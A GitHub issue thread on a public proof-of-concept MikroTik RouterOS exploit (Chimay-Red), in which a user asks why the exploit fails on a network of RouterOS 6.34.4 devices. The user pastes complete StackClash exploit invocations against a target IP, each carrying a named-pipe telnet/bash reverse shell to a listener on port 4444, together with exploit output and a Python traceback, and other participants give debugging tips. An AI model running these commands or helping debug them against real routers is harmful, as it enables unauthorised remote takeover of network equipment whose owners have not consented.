search

BigNerd95 / Chimay-Red

Working POC of Mikrotik exploit from Vault 7 CIA Leaks
655 stars 217 forks source link

Netcat or meterpreter won't connect!!! #51

Open Husseo19 opened 6 years ago

Husseo19 commented 6 years ago

Hey man, i am on a network with lots of RouterOs 6.34.4. Tried your scripts but can't get a connection neither through Netcat or meterpreter! I used first x86 binary file and stackclashx86.

python StackClash_x86.py 18.10.0.170 80 www_binary_x86 "/bin/mknod /ram/f p; /bin/telnet 192.168.1.105 4444 < /ram/f | /bin/bash > /ram/f 2>&1" Building ROP chain... [+] Binary loaded [+] Loading gadgets, please wait... [+] Gadgets loaded ! The ROP chain is 1912 bytes long (32768 bytes available) Crash... Connected Sent Sent Opening 2 sockets Connected Connected Stack clash... Sent Sent Sent Sending payload Sent Starting exploit Done!

Netcat doesn't respond. Tips?

P.S I tried the mips Versions with corresponding mips scripts. It won't work, so i assume the device isn't misbpe arch? Here is what i got. //////////////////////////////////////////////////////////////////////////////////////////////////////// python StackClash_mips.py 18.10.0.170 80 www_binary_mips "/bin/mknod /ram/f p; /bin/telnet 192.168.1.105 4444 < /ram/f | /bin/bash > /ram/f 2>&1" Building shellcode + ROP chain... Traceback (most recent call last): File "StackClash_mips.py", line 258, in payload = build_payload(binRop, shellCmd) File "StackClash_mips.py", line 140, in build_payload shell_code = build_shellcode(shellCmd) File "StackClash_mips.py", line 93, in build_shellcode shellCmd = bytes(shellCmd, "ascii") TypeError: str() takes at most 1 argument (2 given) //////////////////////////////////////////////////////////////////////////////////////////////////

Thankks in Advance!

BigNerd95 commented 6 years ago

You have to use python3 with stackclash mips Anyway if you have direct access to these boards you can check the arch with MNDP

Husseo19 commented 6 years ago

Thanks for the answer, but why is it that i don't get any kind of response after executing? it says the payloads is send, and the exploits starts but nothing happens after that! I tried your script from exploit_db as well Thanks again :)

JburkeRSAC commented 5 years ago

I get the same issues regardless of using python3 with mipsbe build or python with x86